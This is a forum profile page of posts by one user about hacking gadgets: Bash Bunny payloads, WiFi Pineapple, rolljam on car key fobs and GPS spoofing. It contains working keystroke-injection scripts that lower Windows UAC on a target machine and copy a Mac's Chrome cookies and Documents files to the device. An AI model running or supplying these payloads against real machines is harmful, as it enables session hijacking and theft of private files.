Onus
-
Posts
115 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Onus
-
-
Has anyone got the captive portal working? I pulled the latest, and slapped it on switch 1.
It starts to work.. shows up correctly and even opens a browser, but to the users home page, not the captive portal..
EDIT: should note that it doesn't prevernt me from accessing the web via my wifi, and shows that it is connected to the ethernet adapter as well but with no internet..
Windows 10 target
-
I'm noticing that a script that is set to:
ATTACKMODE HID STORAGE
has significant consequences to the speed of your script.
I have found that on some windows machines, the fact that storage is enabled could open a delayed finder window, which may gain focus in the middle of your quacking. Thus i end up putting a 3 second delay before any initial key strokes, in a sort of cross my fingers manner.. I realize we need it to mount before we do any real looting anyway, but there are plenty of things we could do in the mean time, like de-esculate user account control settings.. Anyway, wondering if others are coming up with creative ways around this or even consistantly experiencing it.
-
10 minutes ago, GermanNoob said:
I don't have my windows vm ready to test the overall script, but at least I don't understand your first four lines of code...
- setting the LED
- pause the HID to make keystrokes? You haven't typed anything by now... I'm not sure if a beginning pause is needed on the BashBunny as I don't know when the script will be executed (after the target host accepted the attack mode?)
- setting the LED to blue
- another pause for the HID (this one can definitely be removed and from my point of view at least on of the LED settings).
And you are missing to set the attack mode...
Sorry my bad on the attack mode.. I missed it in my copy/paste..
2, This attack mode was both HID and Storage.. the initial delay is because I found on some windows machines, the storage mode will take a bit and open a finder window.. to make sure that finder window doesn't take focus in the middle of my script, i wait before typing anything....
1& 3. The LED stuff is preference obviously..
-
I just refractored an old ducky script I wrote for lowering the user account control settings on a victem's machine..
Its a bit dirty of a way to go about it, but seems to work on a windows ten machine no matter what the user's current account settings are. Its nt really a stand alone but more of a header for more complicated attacks.
LED R G 300 Q DELAY 3000 LED B 100 Q DELAY 100 # Downgrade user account security to NEVER # Minimize all windows Q GUI d Q GUI r Q DELAY 300 Q STRING useraccountcontrolsettings Q ENTER # deal with potential first prompt if security is too high in a way that won't mess with other possible outcomes Q DELAY 300 Q DOWNARROW Q UPARROW Q DELAY 300 Q ENTER # lower the bar Q DELAY 500 Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DELAY 300 Q TAB Q ENTER Q DELAY 500 # deal with potential final prompt if user had high level Q LEFTARROW Q ENTER Q DELAY 500
Just thought I'd share, get thoughts, maybe save someone one some time dancing around all the possible keyboard combinations to deal with for a given user's settings and the.
Windows 7+
-
Sorry.. on mine it's files.. I changed the name as im storing more than xls files.. but yes the folder exists and has files but $files keeps saying 0
-
I just tried removing the kill terminal command so that I can use the terminal to log $files and editing your script above to look like this after the sync call:
# Sync filesystem sync files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files QUACK ENTER if [ $files != 0] then # Got files LED G else LED R # No files fi
I am perplexed why $files keeps reading as 0 even though I have copied 16 files.. if I run the same line in terminal myself:
ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l
I get 16 but the script keeps returning 0
Its stupid bells and whistles.. but damn it I want to know.
-
Just now, audibleblink said:
it's still in the github code, i only pasted changes here.
I gathered that.. I mean the old file didn't sync the file system and always went LED red even when there were files, would this fix that
-
wow.. this is almost identical to the changes I have been making since my last comment... Awesome.. (high five)
Is the lack of sync why I was never getting a success? If sync fixes this might be nice to add back in the logic for the led at the end indicating whether the files were found/copied..
-
Wondering if we know of any TVS with USB inputs that can be played with.. I know an android phone for instance allows you to plug in a USB keyboard for ducky style attacks, was going to play with usb ethernet adapters on an android when I get home from work, but am wondering if there is already someone on here that has tried such with smart tvs.
-
-
But how do we do this to the bunny
-
cd ENTER works too.. I was just playing around with the MacInfoGraber payload by : kmakblob
and in order to get it to work I had to change it:
Original:
LED R ATTACKMODE HID STORAGE LOOTDIR=/loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 8000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 500 QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK GUI q QUACK DELAY 500 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"] then # Got spreadsheet files LED R B else LED R # No spread sheets fi
Post Fiddles - I had to escape spaces and even the escape of the escape space as well as other special chars to get it to work.. didn't try escaping ~
LED R G 100 ATTACKMODE HID STORAGE LOOTDIR=loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 1000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 1000 QUACK STRING cd QUACK ENTER QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK DELAY 1000 QUACK ENTER QUACK STRING cd QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK STRING cd Documents QUACK ENTER QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/ #QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cd #QUACK GUI q QUACK DELAY 2000 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files if [ “$files” != “0”] then # Got files LED G else LED R # No files fi
-
Is there a way to specifically makevthe bash bunny HID look like an apple keyboard to bypass keyboard assistant?
-
On 5/25/2016 at 6:36 AM, NotPike said:
To generate the signal file, I used a bit rate of 8 and download an updated GPS broadcast ephemeris file(brdc1280.16n). You can download these files here.
./gps-sdr-sim -b 8 -e brdc1280.16n -l 40.712800,-74.005900,100I was playing with the same git repo, was hoping you could explain to me what the broadcast ephemeris is exactly.. i am using the one that came with the repo, brdc3540.14n with pretty good success.. whats the difference with the file you are using, why did you use it and what is its purpose.. sorry im a nube jamesbond villian.. p.s. im using a bladeRFx40
Onus
-
:) fun!!! pirate TV old school.. <3 I recently purchased a bladeRF going to have to try this.. have you seen this video:
I have been playing with YateBTS which is also very fun. (in a lead box of course!)
-
For me this was a security setting on my router.. exactly what @kevvyg said.. i like an idiot have an xfinity router, had to set the firewall settings to LOW and then i could update
-
Ha, I have thought about opening up an old laptop and putting in pi zero or something like a built in backdoor that would exist even if they formated the PC and installed a new OS.. another thought was to install a pi in my car that I could ssh into and start/stop a jammer of my own..
Still playing with a rolljam for fsk, I think the way to do it might be to jam on ask at say 43390000 and then on the second yard stick listen at 2fsk 433920000. Thoughts? I'm very new to SDR and the learning curve is quite steep
Onus
-
I recently tried to do a rolljam on my car as a proof of concept.. using two yardstick ones, one to jam and one to replay, but my car uses fsk not ask and I can't seem to get a roll jam to work.. I can certainly jam my car so that it can't get the key fobs packet but can't seem to properly capture the packet/filter out the jam signal..
I'll check all the links above tonight..
-
Hi all..
I recently purchased both a yard stick and a RTL SDR.
I was going to start writing my own python script that allowed me to quickly input which SDR device to turn on, what frequency to cooperate at and what mode.
My first question is around setting the index of devices.. how can I get a list of SDR devices plugged in and their index?
My other question is what are the accepted constants for setting the modulation type with rfcat
Onus
-
I don't know about that technique, but would that cause my remote key, to be out of sync.. it seems to me that since my key remote wouldn't lock until I hit unlock, indicates that the pin was probably incremented and my key was behind, thus out of sync.. does that make sense..
-
I personally have not dabbled with RF hacking, so please forgive any ignorance that reveals itself with this post. I recently bought a 2016 honda civic. I live in a city neighborhood and park it on the one way street that I live on. It like most cars, has a key that also allows for remote locking / arming of the alarm, and unlocking, as well as opening the trunk.
Anyway, a few weeks into buying the car I started noticing my trunk would be open in the morning. At first I figured I must have accidentally hit the trunk button on the key, and started being much more careful about where I put my keys down. But it kept happening, always over night and on my street. It was not happening when I stayed over my girlfriends for weeks at a time, or anywhere else. Just when I parked it on my street.
The other night 15 of my neighbors cars on my street were all broken into, with their glove compartments rifled through. 2 cars were flat out stolen, and not a single alarm had gone off. None of the cars showed evidence of forced entry.. my car was one of them. My car was parked literally right out side my bedroom window and I know I would have heard the alarm.. the interesting thing to me was that after I heard about the break ins, and rushed to check my car, I first tried clicking the lock/engage alarm button on my key.. only to find my car was not responding to it. I found my car unlocked, no evidence of tampering.. the key fob eventually started working again, only after I tried unlocking it first.. it was as if the key fob was out of sync and the rolling pin was off or something.. do you folks think my street was attacked with an SDR attack? Honda told me that my battery might be low.. trust me, its not... I tested the battery, and everything works now.. I am almost certain it wasn't working because it somehow fell out of sync..
Also would love some clever ideas on how to fuck with these petty theifs should they do it again.
#karateForDefence
-
I have been playing with the pineapple for a few months now and recently did a factory reset.. I noticed that even though i only have 3 SSIDs in my pool, and they were all added manually after my last reset, and im not logging probes, or capturing ssids to my pool, PineAP still seems to be broadcasting just about anything anyone around me is probing for.. I am trying to be as stealthy as can be as i am actually just playing with it and not trying to grab a bunch of strangers associations... but everyone around me is seeing every imaginable ssid when i power on.. Is Karma running? is there a way to stop this and ONLY broadcast whats in my pool? Side note, i have done so many resets because if my pool gets large the pineapple doesn't seem to allow me to clear the pool. i click clear, and it clears for a second but then all the gazzillion ssids that were ther just come back, unless i reset.
-
I have had the pineapple up and running for a few months now. Its been great. but all of a sudden i cant seem to set up the internet connection on it.
I have even tried resetting the pineapple but to no avail.
IFCONFIG
root@kali2:~# ifconfigeth0 Link encap:Ethernet HWaddr 54:ee:75:43:38:4c
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)eth1 Link encap:Ethernet HWaddr 00:c0:ca:8b:3c:8d
inet addr:172.16.42.195 Bcast:172.16.42.255 Mask:255.255.255.0
inet6 addr: fe80::2c0:caff:fe8b:3c8d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3095 errors:0 dropped:0 overruns:0 frame:0
TX packets:2986 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1842286 (1.7 MiB) TX bytes:694007 (677.7 KiB)lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:3053 errors:0 dropped:0 overruns:0 frame:0
TX packets:3053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:236400 (230.8 KiB) TX bytes:236400 (230.8 KiB)wlan0 Link encap:Ethernet HWaddr ac:d1:b8:11:04:6f
inet addr:192.168.1.19 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::aed1:b8ff:fe11:46f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19110 errors:0 dropped:0 overruns:0 frame:0
TX packets:20149 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11734512 (11.1 MiB) TX bytes:1922209 (1.8 MiB)WP6.sh
WiFi Pineapple Netmask [255.255.255.0]:
WiFi Pineapple Network [172.16.42.0/24]:
Host Interface to WiFi Pineapple [eth1]:
Host Interface to Internet [wlan0]:
Internet Gateway [172.16.42.1]: 192.168.1.1
IP Address of Host [172.16.42.42]: 172.16.42.195
IP Address of WiFi Pineapple [172.16.42.1]:Save settings for next session [Y/n]? Y
Settings saved. Connect now [Y/n]? Y
_ . ___ \||/ Internet: 192.168.1.1 - wlan0
( _ )_ <--> [___] <--> ,<><>, Computer: 172.16.42.195
(_ _(_ ,) \___\ '<><>' Pineapple: 172.16.42.0/24 - eth1Browse to http://172.16.42.1:1471
ROUTEroot@kali2:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
172.16.42.0 * 255.255.255.0 U 0 0 0 eth1
192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0
I have tried this several times with several different networks on my wlan0
I am super frustrated.. can someone please help? running kali2
-
Hello fellow hake forum fans,
I recently set up a xenserver on an intel nuc, and have a few VMs up and runnning. Right now all 4 VMS show up on the network using the same ethernet NIC and have different ip addresses, which is great and my home hack lab is almost complete. YAY! except my dreams have been a little crushed.
I wanted to use this little portable hack lab in a demo at work on exploiting various windows machines on a network with metasploit thus gaining meterpreter sessions. Its not a complete show stopper, but i wanted to demo how one could get access even to a users webcam. Problem is, the VMs don't have web cams right. So while i was waiting for my nut to arrive, i prematurely grabbed a few cheap $5 usb webcams from micro center. The cams work right out of the box on both my realworld linux and windows machines, but it seems i can't do usb passthroughs to VMs on XenServer, accept for usb storage devices.
I am wondering if anyone else using xenserver has managed to get anything working like this. The idea was to plug in a few usb web cams and assign them to different VMs on my host. I read somewhere that it may be possible with usb over network but the devices i have found for that seem to expensive of a risk.
I realize that xenserver is open source so i guess i was hoping someone made a plug in for this.
I gather another option would be to use a different hypervisor rather than xenserver. but i don't feel like paying for ESXi and had a real hard time trying to build an iso for nuc. none of the tutorials i have seen worked for me.
Thoughts?
Captive Portal
in Bash Bunny
Posted
I'll look into it.. Yeah I actually got it to work on my windows machine once or twice when disconnecting from my wifi network even after it reconnected, but then yeah went back to normal internet. I am wondering if its possible to make a captive portal run on a locked machine much like quick creds.. im totally new to responder so i need to look at that too. I was thinking of rerouting with responder to the var www of the bunny don't know if that is possible